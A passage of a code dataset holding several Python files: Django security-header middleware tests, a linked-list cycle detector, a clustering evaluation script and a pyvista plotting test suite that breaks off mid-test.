resp['strict-transport-security'])\n\n\n@mock.patch.object(settings._wrapped, 'STS_SUBDOMAINS', True)\ndef test_sts_middleware_subdomains():\n    resp = _make_resp(middleware.StrictTransportMiddleware, secure=True)\n    assert 'strict-transport-security' in resp\n    assert resp['strict-transport-security'].endswith('includeSubDomains')\n\n\ndef test_xframe_middleware():\n    resp = _make_resp(middleware.FrameOptionsHeader)\n    assert 'x-frame-options' in resp\n    eq_('DENY', resp['x-frame-options'])\n\n\ndef test_xframe_middleware_no_overwrite():\n    mw = middleware.FrameOptionsHeader()\n    resp = HttpResponse()\n    resp['x-frame-options'] = 'SAMEORIGIN'\n    resp = mw.process_response({}, resp)\n    eq_('SAMEORIGIN', resp['x-frame-options'])\n\n\ndef test_xframe_middleware_disable():\n    mw = middleware.FrameOptionsHeader()\n    resp = HttpResponse()\n    resp.no_frame_options = True\n    resp = mw.process_response({}, resp)\n    assert not 'x-frame-options' in resp\n","sub_path":"commonware/response/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"132362884","text":"# Determine whether a linked list has a cycle\nclass ListNode(object):\n    def __init__(self, x):\n        self.val = x\n        self.next = None\n\nclass Solution(object):\n    def hasCycle(self, head):\n        dic = {}\n        while head:\n            if head not in dic:\n                dic[head] = 1\n            else:\n                return True\n            head = head.next\n        return False\n\n\nl1 = ListNode(1)\nl2 = ListNode(2)\nl3 = ListNode(3)\nl4 = ListNode(4)\nl5 = ListNode(5)\nl6 = ListNode(6)\nl1.next = l2\nl2.next = l3\nl3.next = l4\nl4.next = l5\nl5.next = l6\nl6.next = l2\n\ns = Solution()\nprint(s.hasCycle(l1))","sub_path":"Python/141.Linked List Cycle.py","file_name":"141.Linked List Cycle.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"284461079","text":"from future.utils import viewitems\n\nimport csv\nimport collections\nimport itertools\nfrom sklearn import metrics\n\nexp = 'results_2/'\nmanual_clusters = exp + 'VAL_music20k_golden.csv'\ndedupe_clusters = exp + 'VAL_F-MWSP_music20k_output.csv'\nrow_id_name = 'TID'\n\ndef evaluateDuplicates(found_dupes, true_dupes):\n    true_positives = found_dupes.intersection(true_dupes)\n    false_positives = found_dupes.difference(true_dupes)\n    uncovered_dupes = 
true_dupes.difference(found_dupes)\n\n print('found duplicate: %d' % len(found_dupes))\n\n precision = 1 - len(false_positives) / float(len(found_dupes))\n print('Precision: %0.3f' % precision)\n\n recall = len(true_positives) / float(len(true_dupes))\n print('Recall: %0.3f' % recall)\n\n F1 = 2 * precision * recall / (precision + recall)\n print('F1: %0.3f' % F1)\n\ndef evaluateMeasures(found_list, true_list):\n\n print(\"Homogeneity: %0.3f\" % metrics.homogeneity_score(true_list, found_list))\n print(\"Completeness: %0.3f\" % metrics.completeness_score(true_list, found_list))\n print(\"V-measure: %0.3f\" % metrics.v_measure_score(true_list, found_list))\n print(\"Adjusted Rand Index: %0.3f\"\n % metrics.adjusted_rand_score(true_list, found_list))\n print(\"Adjusted Mutual Information: %0.3f\"\n % metrics.adjusted_mutual_info_score(true_list, found_list))\n print(\"Fowlkes Mallows: %0.3f\" % metrics.fowlkes_mallows_score(true_list, found_list))\n \ndef dupePairs(filename, rowname, row_id_name) :\n dupe_d = collections.defaultdict(list)\n dupe_l = []\n\n with open(filename) as f:\n reader = csv.DictReader(f, delimiter=',', quotechar='\"')\n for row in reader:\n #print(row)\n dupe_d[row[rowname]].append(row[row_id_name])\n if row[rowname] != 'x':\n dupe_l.append(row[rowname])\n\n if 'x' in dupe_d :\n del dupe_d['x']\n\n dupe_s = set([])\n for (unique_id, cluster) in viewitems(dupe_d) :\n # print(unique_id, len(cluster), cluster)\n if len(cluster) > 1:\n #print(unique_id, len(cluster), cluster)\n for pair in itertools.combinations(cluster, 2):\n dupe_s.add(frozenset(pair))\n \n return dupe_s, dupe_l\n\nprint('WARNING! Check the row_id_name')\nprint(row_id_name)\n\nprint(dedupe_clusters)\n\ntrue_dupes, true_list = dupePairs(manual_clusters, 'True Id', row_id_name)\ntest_dupes, test_list = dupePairs(dedupe_clusters, 'Cluster ID', row_id_name)\n\n#print('test_dupes')\n#print(test_dupes)\nprint(len(true_list))\nprint(len(test_list))\nassert(len(true_list) == len(test_list))\n\nevaluateDuplicates(test_dupes, true_dupes)\nevaluateMeasures(test_list, true_list)\n\n\n","sub_path":"code/music20k/evaluation_old.py","file_name":"evaluation_old.py","file_ext":"py","file_size_in_byte":2686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"360011376","text":"import os\nimport sys\nfrom weakref import proxy\n\nimport imageio\nimport numpy as np\nimport pytest\n\nimport pyvista\nfrom pyvista import examples\nfrom pyvista.plotting import system_supports_plotting\n\nNO_PLOTTING = not system_supports_plotting()\n\nffmpeg_failed = False\ntry:\n try:\n import imageio_ffmpeg\n imageio_ffmpeg.get_ffmpeg_exe()\n except ImportError:\n imageio.plugins.ffmpeg.download()\nexcept:\n ffmpeg_failed = True\n\n\nif __name__ != '__main__':\n OFF_SCREEN = 'pytest' in sys.modules\nelse:\n OFF_SCREEN = False\n\npyvista.OFF_SCREEN = OFF_SCREEN\n\n\nsphere = pyvista.Sphere()\nsphere_b = pyvista.Sphere(1.0)\nsphere_c = pyvista.Sphere(2.0)\n\n@pytest.mark.skipif(NO_PLOTTING, reason=\"Requires system to support plotting\")\ndef test_plot(tmpdir):\n filename = os.path.join(pyvista.USER_DATA_PATH, 'tmp.png')\n scalars = np.arange(sphere.n_points)\n cpos, img = pyvista.plot(sphere,\n off_screen=OFF_SCREEN,\n full_screen=True,\n text='this is a sphere',\n show_bounds=True,\n color='r',\n style='wireframe',\n line_width=10,\n scalars=scalars,\n flip_scalars=True,\n cmap='bwr',\n interpolate_before_map=True,\n screenshot=filename,\n return_img=True)\n assert isinstance(cpos, 
pyvista.CameraPosition)\n assert isinstance(img, np.ndarray)\n assert os.path.isfile(filename)\n os.remove(filename)\n filename = os.path.join(pyvista.USER_DATA_PATH, 'foo')\n cpos = pyvista.plot(sphere, off_screen=OFF_SCREEN, screenshot=filename)\n filename = filename + \".png\" # Ensure it added a PNG extension by default\n assert os.path.isfile(filename)\n # remove file\n os.remove(filename)\n\n\n@pytest.mark.skipif(NO_PLOTTING, reason=\"Requires system to support plotting\")\ndef test_plot_invalid_style():\n with pytest.raises(Exception):\n pyvista.plot(sphere, style='not a style')\n\n\n@pytest.mark.skipif(NO_PLOTTING, reason=\"Requires system to support plotting\")\ndef test_plot_bounds_axes_with_no_data():\n plotter = pyvista.Plotter()\n plotter.show_bounds()\n plotter.close()\n\n\n@pytest.mark.skipif(NO_PLOTTING, reason=\"Requires system to support plotting\")\ndef test_plot_show_grid():\n plotter = pyvista.Plotter()\n plotter.show_grid()\n plotter.add_mesh(sphere)\n plotter.close()\n\n\n@pytest.mark.skipif(NO_PLOTTING, reason=\"Requires system to support plotting\")\ndef test_set_camera_position():\n # with pytest.raises(Exception):\n cpos = [(2.085387555594636, 5.259683527170288, 13.092943022481887),\n (0.0, 0.0, 0.0),\n (-0.7611973344707588, -0.5507178512374836, 0.3424740374436883)]\n\n plotter = pyvista.Plotter(off_screen=OFF_SCREEN)\n plotter.add_mesh(sphere)\n plotter.camera_position = 'xy'\n plotter.camera_position = 'xz'\n plotter.camera_position = 'yz'\n plotter.camera_position = 'yx'\n plotter.camera_position = 'zx'\n plotter.camera_position = 'zy'\n plotter.camera_position = cpos\n cpos_out = plotter.show()\n assert cpos_out == cpos\n\n\n@pytest.mark.skipif(NO_PLOTTING, reason=\"Requires system to support plotting\")\ndef test_plot_no_active_scalars():\n plotter = pyvista.Plotter(off_screen=OFF_SCREEN)\n plotter.add_mesh(sphere)\n with pytest.raises(Exception):\n plotter.update_scalars(np.arange(5))\n with pytest.raises(Exception):\n plotter.update_scalars(np.arange(sphere.n_faces))\n\n\n@pytest.mark.skipif(NO_PLOTTING, reason=\"Requires system to support plotting\")\ndef test_plot_show_bounds():\n plotter = pyvista.Plotter(off_screen=OFF_SCREEN)\n plotter.add_mesh(sphere)\n plotter.show_bounds(show_xaxis=False,\n show_yaxis=False,\n show_zaxis=False,\n show_xlabels=False,\n show_ylabels=False,\n show_zlabels=False,\n use_2d=True)\n # And test backwards compatibility\n plotter.add_bounds_axes(show_xaxis=False,\n show_yaxis=False,\n show_zaxis=False,\n show_xlabels=False,\n show_ylabels=False,\n show_zlabels=False,\n use_2d=True)\n plotter.show()\n\n@pytest.mark.skipif(NO_PLOTTING, reason=\"Requires system to support plotting\")\ndef test_plot_label_fmt():\n plotter = pyvista.Plotter(off_screen=OFF_SCREEN)\n plotter.add_mesh(sphere)\n plotter.show_bounds(xlabel='My X', fmt=r'%.3f')\n plotter.show()\n\n\n@pytest.mark.skipif(NO_PLOTTING, reason=\"Requires system to support plotting\")\n@pytest.mark.parametrize('grid', [True, 'both', 'front', 'back'])\n@pytest.mark.parametrize('location', ['all', 'origin', 'outer', 'front', 'back'])\ndef test_plot_show_bounds_params(grid, location):\n plotter = pyvista.Plotter(off_screen=OFF_SCREEN)\n plotter.add_mesh(pyvista.Cube())\n plotter.show_bounds(grid=grid, ticks='inside', location=location)\n plotter.show_bounds(grid=grid, ticks='outside', location=location)\n plotter.show_bounds(grid=grid, ticks='both', location=location)\n plotter.show()\n\n\n@pytest.mark.skipif(NO_PLOTTING, reason=\"Requires system to support plotting\")\ndef 
test_plotter_scale():\n plotter = pyvista.Plotter(off_screen=OFF_SCREEN)\n plotter.add_mesh(sphere)\n plotter.set_scale(10, 10, 10)\n assert plotter.scale == [10, 10, 10]\n plotter.set_scale(5.0)\n plotter.set_scale(yscale=6.0)\n plotter.set_scale(zscale=9.0)\n assert plotter.scale == [5.0, 6.0, 9.0]\n plotter.scale = [1.0, 4.0, 2.0]\n assert plotter.scale == [1.0, 4.0, 2.0]\n plotter.show()\n\n\n@pytest.mark.skipif(NO_PLOTTING, reason=\"Requires system to support plotting\")\ndef test_plot_add_scalar_bar():\n plotter = pyvista.Plotter(off_screen=OFF_SCREEN)\n plotter.add_mesh(sphere)\n plotter.add_scalar_bar(label_font_size=10, title_font_size=20, title='woa',\n interactive=True, vertical=True)\n plotter.add_scalar_bar(background_color='white', n_colors=256)\n\n\n@pytest.mark.skipif(NO_PLOTTING, reason=\"Requires system to support plotting\")\ndef test_plot_invalid_add_scalar_bar():\n with pytest.raises(Exception):\n plotter = pyvista.Plotter()\n plotter.add_scalar_bar()\n\n\n@pytest.mark.skipif(NO_PLOTTING, reason=\"Requires system to support plotting\")\ndef test_plot_list():\n pyvista.plot([sphere, sphere_b],\n off_screen=OFF_SCREEN,\n style='points')\n\n pyvista.plot([sphere, sphere_b, sphere_c],\n off_screen=OFF_SCREEN,\n style='wireframe')\n\n@pytest.mark.skipif(NO_PLOTTING, reason=\"Requires system to support plotting\")\ndef test_add_lines_invalid():\n plotter = pyvista.Plotter()\n with pytest.raises(Exception):\n plotter.add_lines(range(10))\n\n\n@pytest.mark.skipif(NO_PLOTTING, reason=\"Requires system to support plotting\")\ndef test_open_gif_invalid():\n plotter = pyvista.Plotter(off_screen=OFF_SCREEN)\n with pytest.raises(Exception):\n plotter.open_gif('file.abs')\n\n\n@pytest.mark.skipif(ffmpeg_failed, reason=\"Requires imageio-ffmpeg\")\n@pytest.mark.skipif(NO_PLOTTING, reason=\"Requires system to support plotting\")\ndef test_make_movie():\n # Make temporary file\n filename = os.path.join(pyvista.USER_DATA_PATH, 'tmp.mp4')\n\n movie_sphere = sphere.copy()\n plotter = pyvista.Plotter(off_screen=OFF_SCREEN)\n plotter.open_movie(filename)\n actor = plotter.add_axes_at_origin()\n plotter.remove_actor(actor)\n plotter.add_mesh(movie_sphere,\n scalars=np.random.random(movie_sphere.n_faces))\n plotter.show(auto_close=False, window_size=[304, 304])\n plotter.set_focus([0, 0, 0])\n for i in range(10):\n plotter.write_frame()\n random_points = np.random.random(movie_sphere.points.shape)\n movie_sphere.points = random_points*0.01 + movie_sphere.points*0.99\n movie_sphere.points -= movie_sphere.points.mean(0)\n scalars = np.random.random(movie_sphere.n_faces)\n plotter.update_scalars(scalars)\n\n # checking if plotter closes\n ref = proxy(plotter)\n plotter.close()\n\n # remove file\n os.remove(filename)\n\n try:\n ref\n except:\n raise Exception('Plotter did not close')\n\n\n@pytest.mark.skipif(NO_PLOTTING, reason=\"Requires system to support plotting\")\ndef test_add_legend():\n plotter = pyvista.Plotter(off_screen=OFF_SCREEN)\n plotter.add_mesh(sphere)\n with pytest.raises(Exception):\n plotter.add_legend()\n legend_labels = [['sphere', 'r']]\n plotter.add_legend(labels=legend_labels, border=True, bcolor=None,\n size=[0.1, 0.1])\n plotter.show()\n\n\n@pytest.mark.skipif(NO_PLOTTING, reason=\"Requires system to support plotting\")\ndef test_add_axes_twice():\n plotter = pyvista.Plotter(off_screen=OFF_SCREEN)\n plotter.add_axes()\n plotter.add_axes(interactive=True)\n\n\n@pytest.mark.skipif(NO_PLOTTING, reason=\"Requires system to support plotting\")\ndef test_add_point_labels():\n n 
= 10\n plotter = pyvista.Plotter(off_screen=OFF_SCREEN)\n points = np.random.random((n, 3))\n\n with pytest.raises(Exception):\n plotter.add_point_labels(points, range(n - 1))\n\n plotter.add_point_labels(points, range(n), show_points=True, point_color='r')\n plotter.add_point_labels(points - 1, range(n), show_points=False, point_color='r')\n plotter.show()\n\n\n@pytest.mark.skipif(NO_PLOTTING, reason=\"Requires system to support plotting\")\ndef test_set_background():\n plotter = pyvista.Plotter(off_screen=OFF_SCREEN)\n plotter.set_background('k')\n plotter.set_background([0, 0, 0], top=[1,1,1]) # Gradient\n plotter.show()\n\n plotter = pyvista.Plotter(off_screen=OFF_SCREEN, shape=(1,2))\n plotter.set_background('orange')\n for renderer in plotter.renderers:\n assert renderer.GetBackground() == pyvista.parse_color('orange')\n plotter.show()\n\n plotter = pyvista.Plotter(off_screen=OFF_SCREEN, shape=(1,2))\n plotter.subplot(0,1)\n plotter.set_background('orange', all_renderers=False)\n assert plotter.renderers[0].GetBackground() != pyvista.parse_color('orange')\n assert plotter.renderers[1].GetBackground() == pyvista.parse_color('orange')\n plotter.show()\n\n\n@pytest.mark.skipif(NO_PLOTTING, reason=\"Requires system to support plotting\")\ndef test_add_points():\n n = 10\n plotter = pyvista.Plotter(off_screen=OFF_SCREEN)\n points = np.random.random((n, 3))\n plotter.add_points(points, scalars=np.arange(10), cmap=None, flip_scalars=True)\n plotter.show()\n\n\n@pytest.mark.skipif(NO_PLOTTING, reason=\"Requires system to support plotting\")\ndef test_key_press_event():\n plotter = pyvista.Plotter(off_screen=False)\n plotter.key_press_event(None, None)\n plotter.close()\n\n\n@pytest.mark.skipif(NO_PLOTTING, reason=\"Requires system to support plotting\")\ndef test_left_button_down():\n plotter = pyvista.Plotter(off_screen=False)\n plotter.left_button_down(None, None)\n # assert np.allclose(plotter.pickpoint, [0, 0, 0])\\\n plotter.close()\n\n\n@pytest.mark.skipif(NO_PLOTTING, reason=\"Requires system to support plotting\")\ndef test_show_axes():\n # if not closed correctly, a seg fault occurs when exitting\n plotter = pyvista.Plotter(off_screen=False)\n plotter.show_axes()\n plotter.close()\n\n\n@pytest.mark.skipif(NO_PLOTTING, reason=\"Requires system to support plotting\")\ndef test_update():\n plotter = pyvista.Plotter(off_screen=True)\n plotter.update()\n plotter.close()\n\n\n@pytest.mark.skipif(NO_PLOTTING, reason=\"Requires system to support plotting\")\ndef test_plot_cell_arrays():\n plotter = pyvista.Plotter(off_screen=OFF_SCREEN)\n scalars = np.arange(sphere.n_faces)\n plotter.add_mesh(sphere, interpolate_before_map=True, scalars=scalars,\n n_colors=5, rng=10)\n plotter.show()\n\n@pytest.mark.skipif(NO_PLOTTING, reason=\"Requires system to support plotting\")\ndef test_plot_clim():\n plotter = pyvista.Plotter(off_screen=OFF_SCREEN)\n scalars = np.arange(sphere.n_faces)\n plotter.add_mesh(sphere, interpolate_before_map=True, scalars=scalars,\n n_colors=5, clim=10)\n plotter.show()\n assert plotter.mapper.GetScalarRange() == (-10, 10)\n\n\n@pytest.mark.skipif(NO_PLOTTING, reason=\"Requires system to support plotting\")\ndef test_invalid_n_arrays():\n with pytest.raises(Exception):\n plotter = pyvista.Plotter(off_screen=OFF_SCREEN)\n plotter.add_mesh(sphere, scalars=np.arange(10))\n plotter.show()\n\n\n@pytest.mark.skipif(NO_PLOTTING, reason=\"Requires system to support plotting\")\ndef test_plot_arrow():\n cent = np.random.random(3)\n direction = np.random.random(3)\n cpos, img = 
pyvista.plot_arrows(cent, direction, off_screen=True, screenshot=True)\n assert np.any(img)\n\n\n@pytest.mark.skipif(NO_PLOTTING, reason=\"Requires system to support plotting\")\ndef test_plot_arrows():\n cent = np.random.random((100, 3))\n direction = np.random.random((100, 3))\n cpos, img = pyvista.plot_arrows(cent, direction, off_screen=True, screenshot=True)\n assert np.any(img)\n\n\n@pytest.mark.skipif(NO_PLOTTING, reason=\"Requires system to support plotting\")\ndef test_axes():\n plotter = pyvista.Plotter(off_screen=True)\n plotter.add_axes()\n plotter.add_mesh(pyvista.Sphere())\n plotter.show()\n\n\n@pytest.mark.skipif(NO_PLOTTING, reason=\"Requires system to support plotting\")\ndef test_box_axes():\n plotter = pyvista.Plotter(off_screen=True)\n plotter.add_axes(box=True, box_args={'color_box':True})\n plotter.add_mesh(pyvista.Sphere())\n plotter.show()\n\n\n@pytest.mark.skipif(NO_PLOTTING, reason=\"Requires system to support plotting\")\ndef test_screenshot(tmpdir):\n plotter = pyvista.Plotter(off_screen=True)\n plotter.add_mesh(pyvista.Sphere())\n img = plotter.screenshot(transparent_background=True)\n assert np.any(img)\n img_again = plotter.screenshot()\n assert np.any(img_again)\n filename = str(tmpdir.mkdir(\"tmpdir\").join('export-graphic.svg'))\n plotter.save_graphic(filename)\n\n # checking if plotter closes\n ref = proxy(plotter)\n plotter.close()\n\n try:\n ref\n except:\n raise Exception('Plotter did not close')\n\n\n\n@pytest.mark.skipif(NO_PLOTTING, reason=\"Requires system to support plotting\")\ndef test_scalars_by_name():\n plotter = pyvista.Plotter(off_screen=OFF_SCREEN)\n data = examples.load_uniform()\n plotter.add_mesh(data, scalars='Spatial Cell Data')\n plotter.show()\n\n\ndef test_themes():\n pyvista.set_plot_theme('paraview')\n pyvista.set_plot_theme('document')\n pyvista.set_plot_theme('night')\n pyvista.set_plot_theme('default')\n\n\n@pytest.mark.skipif(NO_PLOTTING, reason=\"Requires system to support plotting\")\ndef test_multi_block_plot():\n multi = pyvista.MultiBlock()\n multi.append(examples.load_rectilinear())\n uni = examples.load_uniform()\n arr = np.random.rand(uni.n_cells)\n uni._add_cell_array(arr, 'Random Data')\n multi.append(uni)\n # And now add a data set without the desired array and a NULL component\n multi[3] = examples.load_airplane()\n multi.plot(scalars='Random Data', off_screen=OFF_SCREEN, multi_colors=True)\n\n\n@pytest.mark.skipif(NO_PLOTTING, reason=\"Requires system to support plotting\")\ndef test_clear():\n plotter = pyvista.Plotter(off_screen=OFF_SCREEN)\n plotter.add_mesh(sphere)\n plotter.clear()\n plotter.show()\n\n\n@pytest.mark.skipif(NO_PLOTTING, reason=\"Requires system to support plotting\")\ndef test_plot_texture():\n \"\"\"\"Test adding a texture to a plot\"\"\"\n globe = examples.load_globe()\n texture = examples.load_globe_texture()\n plotter = pyvista.Plotter(off_screen=OFF_SCREEN)\n plotter.add_mesh(globe, texture=texture)\n plotter.show()\n\n@pytest.mark.skipif(NO_PLOTTING, reason=\"Requires system to support plotting\")\ndef test_plot_texture_associated():\n \"\"\"\"Test adding a texture to a plot\"\"\"\n globe = examples.load_globe()\n plotter = pyvista.Plotter(off_screen=OFF_SCREEN)\n plotter.add_mesh(globe, texture=True)\n plotter.show()\n\n@pytest.mark.skipif(NO_PLOTTING, reason=\"Requires system to support plotting\")\ndef test_read_texture_from_numpy():\n \"\"\"\"Test adding a texture to a plot\"\"\"\n globe = examples.load_globe()\n texture = pyvista.numpy_to_texture(imageio.imread(examples.mapfile))\n 
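# numpy_to_texture wraps the (rows, cols, 3) RGB array returned by imageio.imread in a VTK texture object, so the globe can be textured from an in-memory array instead of a file on disk.\n 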
plotter = pyvista.Plotter(off_screen=OFF_SCREEN)\n plotter.add_mesh(globe, texture=texture)\n plotter.show()\n\n\n@pytest.mark.skipif(NO_PLOTTING, reason=\"Requires system to support plotting\")\ndef test_plot_rgb():\n \"\"\"\"Test adding a texture to a plot\"\"\"\n cube = pyvista.Cube()\n cube.clear_arrays()\n x_face_color = (255, 0, 0)\n y_face_color = (0, 255, 0)\n z_face_color = (0, 0, 255)\n face_colors = np.array([x_face_color,\n x_face_color,\n y_face_color,\n y_face_color,\n z_face_color,\n z_face_color,\n ], dtype=np.uint8)\n cube.cell_arrays['face_colors'] = face_colors\n plotter = pyvista.Plotter(off_screen=OFF_SCREEN)\n plotter.add_mesh(cube, scalars='face_colors', rgb=True)\n plotter.show()\n\n\n@pytest.mark.skipif(NO_PLOTTING, reason=\"Requires system to support plotting\")\ndef test_plot_multi_component_array():\n \"\"\"\"Test adding a texture to a plot\"\"\"\n image = pyvista.UniformGrid((3,3,3))\n image['array'] = np.random.randn(*image.dimensions).ravel(order='f')\n plotter = pyvista.Plotter(off_screen=OFF_SCREEN)\n plotter.add_mesh(image, scalars='array')\n plotter.show()\n\n\n@pytest.mark.skipif(NO_PLOTTING, reason=\"Requires system to support plotting\")\ndef test_camera():\n plotter = pyvista.Plotter(off_screen=OFF_SCREEN)\n plotter.add_mesh(sphere)\n plotter.view_isometric()\n plotter.reset_camera()\n plotter.view_xy()\n plotter.view_xz()\n plotter.view_yz()\n plotter.add_mesh(examples.load_uniform(), reset_camera=True, culling=True)\n plotter.view_xy(True)\n plotter.view_xz(True)\n plotter.view_yz(True)\n plotter.show()\n plotter.camera_position = None\n\n\n@pytest.mark.skipif(NO_PLOTTING, reason=\"Requires system to support plotting\")\ndef test_multi_renderers():\n plotter = pyvista.Plotter(shape=(2, 2), off_screen=OFF_SCREEN)\n\n plotter.subplot(0, 0)\n plotter.add_text('Render Window 0', font_size=30)\n sphere = pyvista.Sphere()\n plotter.add_mesh(sphere, scalars=sphere.points[:, 2])\n plotter.add_scalar_bar('Z', vertical=True)\n\n plotter.subplot(0, 1)\n plotter.add_text('Render Window 1', font_size=30)\n plotter.add_mesh(pyvista.Cube(), show_edges=True)\n\n plotter.subplot(1, 0)\n plotter.add_text('Render Window 2', font_size=30)\n plotter.add_mesh(pyvista.Arrow(), color='y', show_edges=True)\n\n plotter.subplot(1, 1)\n plotter.add_text('Render Window 3', position=(0., 0.),\n font_size=30, viewport=True)\n plotter.add_mesh(pyvista.Cone(), color='g', show_edges=True,\n culling=True)\n plotter.add_bounding_box(render_lines_as_tubes=True, line_width=5)\n plotter.show_bounds(all_edges=True)\n\n plotter.update_bounds_axes()\n plotter.show()\n\n # Test subplot indices (2 rows by 1 column)\n plotter = pyvista.Plotter(shape=(2, 1), off_screen=OFF_SCREEN)\n # First row\n plotter.subplot(0,0)\n plotter.add_mesh(pyvista.Sphere())\n # Second row\n plotter.subplot(1,0)\n plotter.add_mesh(pyvista.Cube())\n plotter.show()\n\n # Test subplot indices (1 row by 2 columns)\n plotter = pyvista.Plotter(shape=(1, 2), off_screen=OFF_SCREEN)\n # First column\n plotter.subplot(0,0)\n plotter.add_mesh(pyvista.Sphere())\n # Second column\n plotter.subplot(0,1)\n plotter.add_mesh(pyvista.Cube())\n plotter.show()\n\n with pytest.raises(IndexError):\n # Test bad indices\n plotter = pyvista.Plotter(shape=(1, 2), off_screen=OFF_SCREEN)\n plotter.subplot(0,0)\n plotter.add_mesh(pyvista.Sphere())\n plotter.subplot(1,0)\n plotter.add_mesh(pyvista.Cube())\n plotter.show()\n\n\n # Test subplot 3 on left, 1 on right\n plotter = pyvista.Plotter(shape='3|1', off_screen=OFF_SCREEN)\n # First column\n 
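# With a string shape such as '3|1', subplots are addressed by a single linear index (0 through 3) rather than a (row, column) pair.\n 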
plotter.subplot(0)\n plotter.add_mesh(pyvista.Sphere())\n plotter.subplot(1)\n plotter.add_mesh(pyvista.Cube())\n plotter.subplot(2)\n plotter.add_mesh(pyvista.Cylinder())\n plotter.subplot(3)\n plotter.add_mesh(pyvista.Cone())\n plotter.show()\n\n # Test subplot 3 on bottom, 1 on top\n plotter = pyvista.Plotter(shape='1|3', off_screen=OFF_SCREEN)\n # First column\n plotter.subplot(0)\n plotter.add_mesh(pyvista.Sphere())\n plotter.subplot(1)\n plotter.add_mesh(pyvista.Cube())\n plotter.subplot(2)\n plotter.add_mesh(pyvista.Cylinder())\n plotter.subplot(3)\n plotter.add_mesh(pyvista.Cone())\n plotter.show()\n\n\n\n@pytest.mark.skipif(NO_PLOTTING, reason=\"Requires system to support plotting\")\ndef test_link_views():\n plotter = pyvista.Plotter(shape=(1, 4), off_screen=OFF_SCREEN)\n sphere = pyvista.Sphere()\n plotter.subplot(0, 0)\n plotter.add_mesh(sphere, smooth_shading=False, show_edges=False)\n plotter.subplot(0, 1)\n plotter.add_mesh(sphere, smooth_shading=True, show_edges=False)\n plotter.subplot(0, 2)\n plotter.add_mesh(sphere, smooth_shading=False, show_edges=True)\n plotter.subplot(0, 3)\n plotter.add_mesh(sphere, smooth_shading=True, show_edges=True)\n with pytest.raises(TypeError):\n plotter.link_views(views='foo')\n plotter.link_views([0, 1])\n plotter.link_views()\n with pytest.raises(TypeError):\n plotter.unlink_views(views='foo')\n plotter.unlink_views([0, 1])\n plotter.unlink_views(2)\n plotter.unlink_views()\n plotter.show()\n\n\n@pytest.mark.skipif(NO_PLOTTING, reason=\"Requires system to support plotting\")\ndef test_orthographic_slicer():\n data = examples.load_uniform()\n data.set_active_scalars('Spatial Cell Data')\n\n slices = data.slice_orthogonal()\n\n # Orthographic Slicer\n p = pyvista.Plotter(shape=(2,2), off_screen=OFF_SCREEN)\n\n p.subplot(1,1)\n p.add_mesh(slices, clim=data.get_data_range())\n p.add_axes()\n p.enable()\n\n p.subplot(0,0)\n p.add_mesh(slices['XY'])\n p.view_xy()\n p.disable()\n\n p.subplot(0,1)\n p.add_mesh(slices['XZ'])\n p.view_xz(negative=True)\n p.disable()\n\n p.subplot(1,0)\n p.add_mesh(slices['YZ'])\n p.view_yz()\n p.disable()\n\n p.show()\n\n@pytest.mark.skipif(NO_PLOTTING, reason=\"Requires system to support plotting\")\ndef test_remove_actor():\n data = examples.load_uniform()\n plotter = pyvista.Plotter(off_screen=OFF_SCREEN)\n plotter.add_mesh(data, name='data')\n plotter.add_mesh(data, name='data')\n plotter.add_mesh(data, name='data')\n plotter.show()\n\n\n@pytest.mark.skipif(NO_PLOTTING, reason=\"Requires system to support plotting\")\ndef test_image_properties():\n mesh = examples.load_uniform()\n p = pyvista.Plotter(off_screen=OFF_SCREEN)\n p.add_mesh(mesh)\n p.show(auto_close=False) # DO NOT close plotter\n # Get RGB image\n _ = p.image\n # Get the depth image\n _ = p.get_image_depth()\n p.close()\n p = pyvista.Plotter(off_screen=OFF_SCREEN)\n p.add_mesh(mesh)\n p.show() # close plotter\n # Get RGB image\n _ = p.image\n # Get the depth image\n _ = p.get_image_depth()\n p.close()\n\n\n@pytest.mark.skipif(NO_PLOTTING, reason=\"Requires system to support plotting\")\ndef test_volume_rendering():\n # Really just making sure no errors are thrown\n vol = examples.load_uniform()\n vol.plot(off_screen=OFF_SCREEN, volume=True, opacity='linear')\n\n plotter = pyvista.Plotter(off_screen=OFF_SCREEN)\n plotter.add_volume(vol, opacity='sigmoid', cmap='jet', n_colors=15)\n plotter.show()\n\n # Now test MultiBlock rendering\n data = pyvista.MultiBlock(dict(a=examples.load_uniform(),\n b=examples.load_uniform(),\n c=examples.load_uniform(),\n 
d=examples.load_uniform(),))\n data['a'].rename_array('Spatial Point Data', 'a')\n data['b'].rename_array('Spatial Point Data', 'b')\n data['c'].rename_array('Spatial Point Data', 'c')\n data['d'].rename_array('Spatial Point Data', 'd')\n data.plot(off_screen=OFF_SCREEN, volume=True, multi_colors=True, )\n\n # Check that NumPy arrays work\n arr = vol[\"Spatial Point Data\"].reshape(vol.dimensions)\n pyvista.plot(arr, off_screen=OFF_SCREEN, volume=True, opacity='linear')\n\n\n\n@pytest.mark.skipif(NO_PLOTTING, reason=\"Requires system to support plotting\")\ndef test_plot_compar_four():\n # Really just making sure no errors are thrown\n mesh = examples.load_uniform()\n data_a = mesh.contour()\n data_b = mesh.threshold_percent(0.5)\n data_c = mesh.decimate_boundary(0.5)\n data_d = mesh.glyph()\n pyvista.plot_compare_four(data_a, data_b, data_c, data_d,\n disply_kwargs={'color':'w'},\n plotter_kwargs={'off_screen':OFF_SCREEN},)\n return\n\n\n@pytest.mark.skipif(NO_PLOTTING, reason=\"Requires system to support plotting\")\ndef test_plot_depth_peeling():\n mesh = examples.load_airplane()\n p = pyvista.Plotter(off_screen=OFF_SCREEN)\n p.add_mesh(mesh)\n p.enable_depth_peeling()\n p.disable_depth_peeling()\n p.show()\n\n\n@pytest.mark.skipif(NO_PLOTTING, reason=\"Requires system to support plotting\")\n@pytest.mark.skipif(os.name == 'nt', reason=\"No testing on windows for EDL\")\ndef test_plot_eye_dome_lighting():\n mesh = examples.load_airplane()\n mesh.plot(off_screen=OFF_SCREEN, eye_dome_lighting=True)\n p = pyvista.Plotter(off_screen=OFF_SCREEN)\n p.add_mesh(mesh)\n p.enable_eye_dome_lighting()\n p.show()\n\n p = pyvista.Plotter(off_screen=OFF_SCREEN)\n p.add_mesh(mesh)\n p.enable_eye_dome_lighting()\n p.disable_eye_dome_lighting()\n 